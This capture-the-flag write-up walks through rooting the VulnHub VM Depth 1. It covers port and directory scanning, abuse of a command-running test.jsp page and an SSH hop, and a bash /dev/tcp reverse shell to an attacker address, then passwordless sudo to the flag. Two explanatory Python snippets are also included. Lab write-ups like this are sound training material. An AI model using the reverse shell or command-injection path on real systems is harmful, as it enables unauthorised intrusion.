Depth 1 Writeup

This is a write-up of Depth 1, a boot2root VM from VulnHub.

First, as usual, I start with a port scan of the box.

# Nmap 7.50 scan initiated Fri Dec 22 16:07:55 2017 as: nmap -A -T4 -sV -p- -Pn -n -v -oA full 192.168.1.76
adjust_timeouts2: packet supposedly had rtt of -1293499 microseconds.  Ignoring time.
Nmap scan report for 192.168.1.76
Host is up (0.00087s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:3E:AD:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Uptime guess: 38.020 days (since Tue Nov 14 15:48:53 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.87 ms 192.168.1.76

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 22 16:17:55 2017 -- 1 IP address (1 host up) scanned in 600.27 seconds

As the scan shows, only one port is open, 8080, running Apache Tomcat (Coyote 1.1); nmap also flags PUT and DELETE as supported HTTP methods. Navigating to that port presents what looks like a default Tomcat installation with some of the files removed.

Moving on, I decide to run some directory brute-forcing against the server to see if there are any interesting files.

root@kali:~/Tools/dirsearch# ./dirsearch.py -u http://192.168.1.76:8080/ -w ../SecLists/Discovery/Web_Content/raft-small-files.txt -t 20 -b -e "jsp"

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: jsp | Threads: 20 | Wordlist size: 11424

Error Log: /root/Tools/dirsearch/logs/errors-17-12-22_16-22-30.log

Target: http://192.168.1.76:8080/

[16:22:30] Starting: 
[16:22:30] 200 -    2KB - /index.html
[16:22:32] 200 -    2KB - /
[16:23:08] 200 -  573B  - /test.jsp

Task Completed

A page called test.jsp was found. Let's see what it does in a browser.

What the page appears to do is run whatever command I type into the text box and print the output after some formatting. Not every command works; echo redirected into a file, for example, does nothing.

With ls -l /home/ I get the username of the local user: bill.

With that at hand, and after many failed attempts to run anything more useful, I notice that wrapping a command in an SSH session back into the box as that user does work. For example, sudo -l on its own returns nothing, but ssh [email protected] sudo -l runs just fine.

Even though the formatting is odd, the text returned looks very much like the familiar "User root may run the following commands on kali" line, so it seems the user does have some privileged access on the system.
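Why the plain command fails while the SSH-wrapped one works comes down to how the command is launched. The write-up does not show the source of test.jsp, so this is an assumption: a JSP that calls Runtime.getRuntime().exec(String) splits the input on whitespace and executes it directly, with no shell in between, so ">" reaches echo as a literal argument and nothing is redirected, whereas ssh user@host <command> hands the whole string to the remote login shell, where redirections, pipes and the normal environment all work. The Python script below is an added example, not code from the write-up or from the VM, that reproduces both behaviours offline: run_like_runtime_exec() emulates the no-shell launch, and run_through_login_shell() stands in for the SSH hop by passing the string to sh -c, which is what the remote login shell would do (assumption: that shell is POSIX sh/bash).

```python
import os
import subprocess
import tempfile


def run_like_runtime_exec(cmdline: str, cwd: str) -> str:
    """Emulate Java's Runtime.exec(String): the string is split on whitespace
    and executed directly. No shell is involved, so redirections, pipes and
    quoting are not interpreted; '>' is just another argument to the program."""
    argv = cmdline.split()
    proc = subprocess.run(argv, cwd=cwd, capture_output=True, text=True)
    return proc.stdout


def run_through_login_shell(cmdline: str, cwd: str) -> str:
    """Stand-in for `ssh bill@host <cmdline>`: ssh joins its arguments into one
    string and hands it to the remote login shell. Assumption: that shell is
    POSIX sh/bash, so `sh -c` reproduces the behaviour without an SSH server."""
    proc = subprocess.run(["sh", "-c", cmdline], cwd=cwd, capture_output=True, text=True)
    return proc.stdout


def demo(cmdline: str = "echo hello > out.txt") -> dict:
    """Run the same command line both ways in a scratch directory and report
    what came back on stdout and whether the redirection actually happened."""
    work = tempfile.mkdtemp()
    target = os.path.join(work, "out.txt")

    # No shell: /bin/echo receives ['hello', '>', 'out.txt'] and prints them all.
    no_shell_stdout = run_like_runtime_exec(cmdline, work)
    no_shell_file = os.path.exists(target)

    # Through a shell: '>' is parsed as a redirection and the file is written.
    shell_stdout = run_through_login_shell(cmdline, work)
    shell_file = os.path.exists(target)
    shell_contents = open(target).read() if shell_file else None

    return {
        "no_shell_stdout": no_shell_stdout,      # 'hello > out.txt\n'
        "no_shell_file_created": no_shell_file,  # False
        "shell_stdout": shell_stdout,            # ''
        "shell_file_created": shell_file,        # True
        "shell_file_contents": shell_contents,   # 'hello\n'
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:>22}: {value!r}")
```

The same split explains the other failures: a bare sudo -l launched without a login session has no terminal and no usable environment, while the SSH hop gives it both. Anything that needs shell syntax (the /dev/tcp redirection of the reverse shell later on) has to go through the hop for the same reason.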

Taking a leap of faith, and since outbound traffic is probably being blocked (the scan already showed a firewall: every other port came back filtered), I go ahead and disable the firewall.

There is no output, so I am working blind. Pushing the leap of faith a bit further, I launch a reverse shell the same way, with ssh [email protected] bash -i >& /dev/tcp/192.168.1.86/4444 0>&1, and since the page hangs instead of loading I have a good feeling about this.

Meanwhile, on my local netcat listener:

root@kali:~/Documents/ctfs/vulnhub/depth# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.1.86] from b2r.lan [192.168.1.76] 40468
bash: cannot set terminal process group (2906): Inappropriate ioctl for device
bash: no job control in this shell
bill@b2r:~$ whoami
whoami
bill
bill@b2r:~$ id
id
uid=1000(bill) gid=1000(bill) groups=1000(bill),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lxd),116(lpadmin),117(sambashare)
bill@b2r:~$

And there it is. It all worked just fine. Now let's check out what kind of access the user has.

bill@b2r:~$ sudo -l
sudo -l
Matching Defaults entries for bill on b2r:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bill may run the following commands on b2r:
    (ALL : ALL) NOPASSWD: ALL

So bill can run any command as root without a password. That means heading straight for the flag.

bill@b2r:~$ sudo su
sudo su
cd /root/
ls
flag
cat flag
flag{WellThatWasEasy}
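The whole escalation hinged on one sudoers rule, (ALL : ALL) NOPASSWD: ALL. When triaging a shell, or auditing a host, it helps to parse sudo -l output instead of eyeballing it. The Python snippet below is an added example, not part of the write-up: it parses the rule lines after the "User ... may run the following commands on ..." header into run-as user and group, tags and command list, and flags the combination that gives unconditional root. The first sample input is the sudo -l output captured above; the second, restricted sample is constructed for contrast and uses hypothetical rules that were never on the box.

```python
import re

# Sample 1: the `sudo -l` output captured on the box (from the write-up).
SUDO_L_BILL = r"""Matching Defaults entries for bill on b2r:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bill may run the following commands on b2r:
    (ALL : ALL) NOPASSWD: ALL
"""

# Sample 2: constructed for contrast; these rules are hypothetical, not from the VM.
SUDO_L_RESTRICTED = """User bill may run the following commands on b2r:
    (root) NOPASSWD: /bin/systemctl restart tomcat8
    (root) /usr/bin/apt-get update
"""

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"   # (user : group) run-as specification
    r"(?P<tags>(?:[A-Z]+:\s*)*)"     # zero or more tags such as NOPASSWD:
    r"(?P<cmds>.+?)\s*$"             # comma-separated command list
)


def parse_sudo_l(text: str) -> list:
    """Return the privilege rules found in `sudo -l` output as a list of dicts.
    Everything before the 'User ... may run ...' header (the Defaults block) is skipped."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands on ", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user, _, runas_group = (p.strip() for p in m.group("runas").partition(":"))
        rules.append({
            "runas_user": runas_user or "root",  # sudoers defaults to root when omitted
            "runas_group": runas_group,          # empty string when no group is listed
            "tags": [t.rstrip(":") for t in m.group("tags").split()],
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def full_root_without_password(rules: list) -> bool:
    """True if any rule lets the user run every command as root (or ALL) with NOPASSWD."""
    return any(
        r["runas_user"] in ("ALL", "root")
        and "ALL" in r["commands"]
        and "NOPASSWD" in r["tags"]
        for r in rules
    )


if __name__ == "__main__":
    for label, sample in (("bill on b2r", SUDO_L_BILL), ("restricted sample", SUDO_L_RESTRICTED)):
        rules = parse_sudo_l(sample)
        print(f"{label}: {len(rules)} rule(s), "
              f"passwordless root = {full_root_without_password(rules)}")
        for r in rules:
            print("   ", r)
```

A False from this check does not mean the host is safe: restricted commands still need a look for arguments that spawn a shell or write arbitrary files, and the id output above also puts bill in the sudo and lxd groups, either of which is a root path in its own right.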

Aaand there it is, the root flag. Thanks a lot to VulnHub, and to Dan Lawson for building this VM.
